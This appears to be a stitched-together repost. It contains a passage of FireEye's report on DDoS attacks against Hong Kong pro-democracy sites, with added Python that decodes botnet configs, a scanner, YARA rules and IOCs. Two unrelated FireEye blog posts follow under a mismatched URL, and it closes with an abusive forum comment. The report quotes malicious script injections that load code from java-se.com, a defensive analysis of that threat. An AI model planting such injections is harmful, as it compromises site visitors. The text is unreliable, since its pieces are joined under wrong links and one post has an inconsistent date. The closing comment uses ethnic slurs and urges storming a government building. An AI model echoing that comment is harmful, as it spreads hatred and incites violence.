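    "[DDOS_UdpFlood]\r\n"
    "IsUdpFlood = 0\r\n"
    "UdpFloodDNS = 10.0.0.1\r\n"
)


def encode_config(plaintext: str, key: int) -> bytes:
    """Build a C2 response the way the text describes it: XOR, base64, @$@ delimiters."""
    xored = bytes(b ^ key for b in plaintext.encode("latin-1"))
    return DELIM + base64.b64encode(xored) + DELIM


def decode_config(payload: bytes, key: int) -> str:
    """Inverse of encode_config: strip delimiters, base64-decode, XOR every byte."""
    body = payload.strip()
    if body.startswith(DELIM):
        body = body[len(DELIM):]
    if body.endswith(DELIM):
        body = body[:-len(DELIM)]
    return bytes(b ^ key for b in base64.b64decode(body)).decode("latin-1")


def looks_like_ini(text: str) -> bool:
    """A correctly decoded config is printable text that starts with a [Section] header."""
    printable = set(string.printable)
    return text.lstrip().startswith("[") and all(c in printable for c in text)


def guess_key_and_decode(payload: bytes):
    """Try each known key; return (key, plaintext) for the first that yields INI text."""
    for key in KNOWN_XOR_KEYS:
        text = decode_config(payload, key)
        if looks_like_ini(text):
            return key, text
    raise ValueError("no known XOR key produced an INI configuration")


def active_flood_targets(ini_text: str):
    """Return (section, target, port) for every DDOS_* section whose Is*Flood flag is 1."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep key case exactly as the bot wrote it
    cp.read_string(ini_text)
    found = []
    for section in cp.sections():
        if not section.startswith("DDOS_"):
            continue
        items = dict(cp.items(section))
        enabled = any(k.startswith("Is") and k.endswith("Flood") and v.strip() == "1"
                      for k, v in items.items())
        if not enabled:
            continue
        # Either a *Url or a *DNS key names the victim; the configs above leave one empty.
        target = next((v.strip() for k, v in items.items()
                       if (k.endswith("Url") or k.endswith("DNS")) and v.strip()), "")
        port = next((v.strip() for k, v in items.items() if k.endswith("Port")), "")
        found.append((section, target, port))
    return found


if __name__ == "__main__":
    wire = encode_config(SAMPLE_CONFIG, 0x7E)  # what a bot would receive from its C2
    key, text = guess_key_and_decode(wire)
    print("XOR key: 0x%02X" % key)
    for section, target, port in active_flood_targets(text):
        print("%s -> %s port %s" % (section, target, port or "?"))
```

Because a wrong key turns the leading "[" into a non-printable byte, the header check alone separates the two keys; the printable-text check guards against responses that use a key outside the two known ones, which should be treated as a new sample rather than silently mis-decoded.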
Over the course of our research we have observed the C2 servers listed above issue more than 30 distinct configuration files. These configurations issued commands to attack the following domains and IP addresses:
nxapi.appledaily.com[.]hk
202.85.162.90
58.64.139.10
202.85.162.97
202.85.162.81
198.41.222.6
202.85.162.101
202.85.162.95
202.85.162.180
202.85.162.140
202.85.162.130
124.217.214.149
All of the above IP addresses host Next Media or Apple Daily websites, except 58.64.139.10 and 124.217.214.149. The IP 58.64.139.10 hosts hkgolden[.]com, the domain of the HKGolden forum mentioned above.
For approximately 14 hours between October 23 and October 24, the attackers pushed configuration updates to four of the control servers instructing the bots under their control to flood 124.217.214.149 with UDP traffic. The IP 124.217.214.149 hosted the attacker-controlled domain p.java-sec[.]com.
On October 23, 2014, two of the active control servers began instructing participating bots to stop attacking. By October 24, 2014, all five known active control servers had issued commands to stop the attacks.
It should come as no surprise that the hkgolden[.]com, nextmedia[.]com and appledaily.com[.]hk websites are now, or have previously been, blocked by China's Great Firewall, indicating that China has found the content hosted on these sites objectionable.

Links to Previous Activity

The most direct connection between these DDoS attacks and previous APT activity is the use of the QTI International and CallTogether code-signing certificates, which we have seen on malware attributed to APT activity.
The QTI International digital certificate has previously been used to sign binaries used in APT activity, including Operation Poisoned Hurricane. Specifically, 17bc9d2a640da75db6cbb66e5898feb1 is a PlugX variant signed with the QTI International certificate. This PlugX variant connects to a Google Code project at code.google[.]com/p/udom/, where it decodes the commands from its configured C2 server.
Sample 0b54ae49fd5a841970b98a078968cb6b was also signed with the QTI International certificate. This sample was first observed during a drive-by attack in June 2014 and was downloaded from java-se[.]com/jp.jpg. The sample is detected as Backdoor.APT.Preshin and connects to luxscena[.]com for C2.
The QTI International certificate was also used to sign e2a4b96cce9de4fb126cfd5f5c73c3ed. We detect this payload as Backdoor.APT.PISCES, and it uses hk.java-se[.]com for C2. The java-se[.]com site was previously seen in other attacks targeting the Hong Kong pro-democracy movement. We first observed malicious JavaScript inserted into the website of the Association for Democracy and People's Livelihood (ADPL) on June 26, 2014, which appeared as follows:

    <a href="http://www.adpl.org.hk/?p=2680" title="抗議九巴加價要求凍結加價,改善服務
    <script language=javascript src=http://java-se.com/o.js></script>">

More recently, as Claudio Guarnieri noted, the Hong Kong Democratic Party website was seen hosting a redirect to the same malicious JavaScript.
The CallTogether certificate was used to sign ecf21054ab515946a812d1aa5c408ca5. We also detect this payload as Backdoor.APT.PISCES and observed it connecting to u.java-se[.]com.
Both certificates are valid, but binaries signed with them can be detected and blocked with the following YARA signatures:
    rule callTogether_certificate
    {
        meta:
            author = "FireEye Labs"
            version = "1.0"
            reference_hash = "d08e038d318b94764d199d7a85047637"
            description = "Detects binaries signed with the CallTogether certificate"
        strings:
            $serial = {452156C3B3FB0176365BDB5B7715BC4C}
            $o = "CallTogether, Inc."
        condition:
            $serial and $o
    }

    rule qti_certificate
    {
        meta:
            author = "FireEye Labs"
            reference_hash = "cfa3e3471430a0096a4e7ea2e3da6195"
            description = "Detects binaries signed with the QTI International Inc certificate"
        strings:
            $cn = "QTI International Inc"
            $serial = {2E DF B9 FD CF A0 0C CB 5A B0 09 EE 3A DB 97 B9}
        condition:
            $cn and $serial
    }
Both the ongoing DDoS attacks and the previous APT intrusion activity have targeted the hkgolden[.]com website. As described above, this site has been targeted by DDoS attacks through the KernelBot network. We also found that the hkgolden[.]com website was compromised on September 5, 2014 with a redirect to malicious JavaScript, once again hosted on another java-se[.]com host, which appeared as follows:

    document.write('<script language=javascript src=http://jre76.java-se.com/js/rss.js></script>')
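Both injections shown in this section, the script tag smuggled into an anchor's title attribute on the ADPL site and the document.write() redirect on hkgolden, have the same observable: a script tag whose src points at a host under java-se[.]com. The following scanner is an added example for this page, not FireEye's tooling; it extracts every external script host from a page, including those hidden inside attribute values or document.write strings, and flags the ones under the IOC domains named in the text. The sample page, the function names and the stand-in victim host www.example.org are constructed for the demonstration; java-se.com and java-sec.com are the domains the text defangs.

```python
import re
from urllib.parse import urlsplit

# Domains this page names as serving the injected JavaScript; written plainly
# here (the text defangs them with [.]) so they can be compared against URLs.
IOC_DOMAINS = ("java-se.com", "java-sec.com")

# Matches a <script ... src=...> tag wherever it appears: in page markup, inside
# an attribute value (the ADPL case) or inside a document.write() string (hkgolden).
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)

# Constructed sample page reproducing the two injection shapes shown above,
# with the victim site replaced by a reserved example name.
SAMPLE_PAGE = (
    '<a href="http://www.example.org/?p=2680" title="news item\n'
    '<script language=javascript src=http://java-se.com/o.js></script>">news</a>\n'
    '<script src="https://www.example.org/site.js"></script>\n'
    "<script>document.write('<script language=javascript "
    "src=http://jre76.java-se.com/js/rss.js></script>')</script>\n"
)


def script_hosts(html: str):
    """Return the lowercased hostname of every <script src=...> with an absolute URL."""
    hosts = []
    for m in SCRIPT_SRC_RE.finditer(html):
        host = urlsplit(m.group(1)).hostname
        if host:  # relative srcs carry no host and are same-origin by definition
            hosts.append(host.lower())
    return hosts


def is_ioc_host(host: str) -> bool:
    """True if host equals, or is a subdomain of, one of the IOC domains."""
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def find_injected_scripts(html: str, site_host: str):
    """Hosts of script tags that load off-site from a known IOC domain."""
    return [h for h in script_hosts(html) if h != site_host and is_ioc_host(h)]


if __name__ == "__main__":
    for host in find_injected_scripts(SAMPLE_PAGE, "www.example.org"):
        print("injected script loaded from", host)
```

The regex deliberately ignores tag nesting, which is what lets it see the script tag inside the title attribute; a DOM parser would treat that text as an attribute value and never report it as a script, which is exactly the blind spot the ADPL injection exploits.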
Finally, as mentioned above, the IP 124.217.214.149 was seen hosting the domain p.java-sec[.]com between October 25, 2014 and October 27, 2014. As Brandon Dixon noted here, the java-sec[.]com domain is linked to java-se[.]com through shared hosting history on the following IP addresses:
124.248.237.26
223.29.248.9
211.233.89.182
112.175.143.2
112.175.143.9
It is unclear why these actors would attack an IP address they were actively using. It is possible that the attackers wanted to test the capacity of their botnet by attacking an IP they used to gather statistics on the scale of the attack. It is also possible that the attackers simply made a mistake and accidentally issued commands to attack their own infrastructure. On October 24, 2014, after attacking their own infrastructure, the attackers issued new instructions for their botnet to stop all attacks.

Conclusion

While not conclusive, the evidence presented above suggests a connection between confirmed APT activity and the ongoing DDoS attacks that appear aimed at silencing the Hong Kong pro-democracy movement. The evidence does not conclusively prove that the same actors responsible for the DDoS attacks are also behind the intrusion activity discussed above, such as Operation Poisoned Hurricane. Rather, the evidence may indicate a common quartermaster supporting both the DDoS attacks and the ongoing intrusion activity.
In either case, there is a clear connection between the intrusion activity documented in Operation Poisoned Hurricane and the DDoS attacks documented here. While the tactics of these campaigns are very different from a technical perspective, each supports a different political goal. The goal of Operation Poisoned Hurricane appears to have been, in part, IP theft, possibly for economic gain or other competitive advantage. In the DDoS attacks, the goal is to suppress free speech and stifle the Hong Kong pro-democracy movement. The Chinese government is the entity most likely to be interested in achieving both goals.

Appendix

MD5s
c3d6450075d618b1edba17ee723eb3ca
d08e038d318b94764d199d7a85047637
84bd0809b1dbc2dc86f30d30faaa7e4e
39bb90140fc0101f49377b6c60076f9d
caa5529010c17b969da01ade084794c6
17bc9d2a640da75db6cbb66e5898feb1
0b54ae49fd5a841970b98a078968cb6b
e2a4b96cce9de4fb126cfd5f5c73c3ed
ecf21054ab515946a812d1aa5c408ca5
Hostnames
tommo[.]jp
mizma.co[.]jp
sp.you-馬夾[.]com
nitori遊[.]com
ninekobe[.]com
shinzenho[.]jp
wizapply[.]com
www.credo-biz[.]com
www.sapporo-數字photoclub[.]com
wakayamasatei[.]com
luxscena[.]com
java-se[.]com
hk.java-se[.]com
u.java-se[.]com
jre76.java-se[.]com
p.java-sec[.]com


 =======================================================
 http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Suppressing Dissent Through the Network


Today our Labs team released a blog titled "Operation Poisoned Handover: Unveiling Ties Between APT Activity and Hong Kong's Pro-Democracy Movement." Clearly, the Chinese government has identified social media and uncontrolled information as a major threat. There is a plausible link between the Chinese hackers likely responsible for some of the advanced persistent threat (APT) attacks centered on intellectual property theft and the ongoing distributed denial-of-service attacks on the pro-democracy movement in Hong Kong. The Chinese government is using its deep bench of professional hackers to take down any online systems that host information about, or support, the pro-democracy movement in Hong Kong. Meanwhile, it continues to shut off social media through China's Great Firewall, restricting access to information on the Internet.

Unrestricted access to social media allows the instantaneous spread of information, new ideas and, most importantly, unrest. The most notable case is the Arab Spring, which began on December 18 and spread rapidly through the surrounding region as protests and uprisings were sparked through social media. By the end of 2013, numerous rulers in the Middle East had been forced from power. It is a powerful tool that protesters use to organize and to let the world know publicly what their governments are doing to keep them silent.

Most governments generally do not like widespread dissent. It makes running a country more difficult when a significant proportion of the population is unhappy with specific policies or practices, and it makes the current ruling party look bad to the rest of the world. In a free and open society, dissent is more accepted and practiced openly; it usually receives a great deal of media coverage, and the government has no choice but to accept it. In a closed society, dissent is either not allowed or tightly controlled, and the media is the enemy of protest, because the government does not want the world to see any unrest and does not want unrest in its own country, lest the trouble spread. That is why the general population has limited access to online information beyond what the government wants them to see. And with today's DDoS revelations, we see governments not just blocking access but going a step further to keep the status quo in place.


 ===============================================================
 http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Attacks from Australia's Chinese Economic Partners: A Double-Edged Sword


During a visit to China in mid-September, Chinese Foreign Minister Wang Yi called on Australia to become "a bridge between East and West." He played down the progress of the free trade agreement under discussion, which seemed likely to be concluded between Australia and China by the end of 2010. His comments referred to furthering the trade relationship between the two countries, but he could just as well have been referring to the hackers who hope to exploit the deepening alliance to steal information.
The Australian Financial Review (AFR) ran an in-depth article with FireEye about Chinese attacks on Australian businesses, and this blog provides additional context.
Australia has experienced unprecedented trade growth with China over the past decade, and it has created a double-edged sword. As Australian businesses partner with Chinese businesses, China-based threat actors increasingly launch sophisticated, targeted cyber attacks to obtain confidential information from Australian businesses. In the United States and Europe, Chinese attacks on government and private industry have become routine in the local newspapers. Australia appears to be the next target.
 
The Numbers
First, let us review the state of economic interdependence between Australia and China. With average annual GDP growth of 9.10% over the past two decades, China's unprecedented economic expansion has shielded Australia from the worst effects of the global financial crisis. Exports to China have grown tenfold, from $8.3B in 2001 to $90B in 2013[I], with iron ore and natural gas the most prominent commodities. Most of these resources originate in Australia, which puts the Chinese government under significant pressure to meet its soaring demand. Despite the ever-increasing cooperation and dependence that Australia and China share as regional partners, the Chinese government likely supports a higher level of surveillance and intelligence gathering against the Australian economy, often conducted through the domestic relationships of Chinese state-owned enterprises (SOEs) in Australia.
Direct investment by SOEs into Australia grew to 84% of all foreign investment inflows from China in 2014, mainly targeting Australia's mining and resources sectors; a further signal of control as China seeks to capture the level of certainty that feeds its future internal growth. We suspect this is the specific agenda of the government-tasked cyber threat actors targeting Australian companies: to gain an advantage in the control of both infrastructure and intellectual property assets.
Figure 1. Chinese direct investment into Australia by industry
The Impact
How might this partnership affect Australia's networks? Mandiant has observed Chinese threat actors targeting the strategic business of companies in major economic sectors, including stealing data from Australian companies. Chinese advanced persistent threats (APTs) affecting Australian mining and natural resource companies may be especially interested in commodity price peaks. There is also an upward trend of Chinese APT attacks targeting third parties in the mining and natural resources ecosystem. Mandiant believes there has been a significant increase in Chinese APT intrusions focused on law firms that hold confidential merger and acquisition information and sensitive intellectual property. It is no coincidence that these third parties are often found to lack network protection. Investigations have also found that, at the time of compromise, most victim companies were in direct negotiations with Chinese businesses, highlighting the Chinese government's attempts to gain an advantage in the targeted areas.
 
Due to its well-known pollution problems, clean energy has developed into an important industry for China. The country is now engaged in a plan to develop Strategic Emerging Industries (SEIs) to address this problem. Australian intellectual property and R&D have become primary data targets and have taken a prominent place in Chinese APT activity. Again, it is third parties such as law firms that are coming under attack.
In addition, to reduce China's reliance on Australian iron ore exports, Beijing has launched a plan to build an efficient, high-end steel production vertical through strategic acquisitions in Australia and intervention to prevent unfavorable alliances. For example, the SOE Chinalco acquired an Australian mining company, presumably to prevent a merger that would have been adverse to its interests. Clearly, the confidential business information of Australia's export partners is increasingly sought after by China.
Mandiant found that most compromised companies either were currently negotiating with Chinese businesses or had previous business dealings with Chinese businesses. These attacks will continue as trade and investment grow, though they will do so at the cost of confidential Australian business information such as R&D and intellectual property. Large Australian mining and resources companies may themselves partner with the Australian Signals Directorate on security, which shifts the focus of threat actors to related parties with access to sensitive data, who may not seek a partnership with the Australian Signals Directorate. This calls for deeper awareness of, and protection against, increasingly determined and advanced attacks.
 
Bottom Line
While this blog focuses on activity against Australia's large mining and resources sector, Mandiant has observed these APT actors frequently turning their attention to other sectors, such as defense, telecommunications, agriculture, political organizations, high tech, transportation, aerospace and more. But the broader lesson, drawn from the experience of the US and Europe with Chinese information attacks, is that no one is, or will be, exempt. For all Australian businesses and government, it is time to harden defenses for a new era of cyber security.
[I] Australian Government Department of Foreign Affairs and Trade. www.dfat.gov.au/publications/stats-pubs/australiasexports-


 ================================================================


"Apple Daily is known around the world for truthful news. However venomous the mainland Communist Party may be, the whole world knows it has no integrity; that garbage Communist Party never admits the many evil things it has done. The people of this world have sharp eyes; lying is the skill of the mainland Communist bastards no mother raised, the filthiest ground of the lowest quality!
Hong Kong people are Hong Kong people, Taiwanese are Taiwanese;
that kind of low-grade character has no business pointing fingers.
That ''government'' (written 正苦, 'truly suffering') garbage building, feel free to storm it at any time!!
Lock the slave dog-shit Leung Chun-ying in prison
and torment him for the rest of his life!
Peace under heaven ~

#############
Does the Australian government still think there are such lavish mainland livestock pigs walking into the net on their own!??
Please be careful and protect your state property!
Would a chinaman ever do a good deed??!! (frightened...!)
Truly a colossal joke

http://melody-free-shaing.blogspot.com/2014/11/from-fireeye-security-research-report.html
=============================



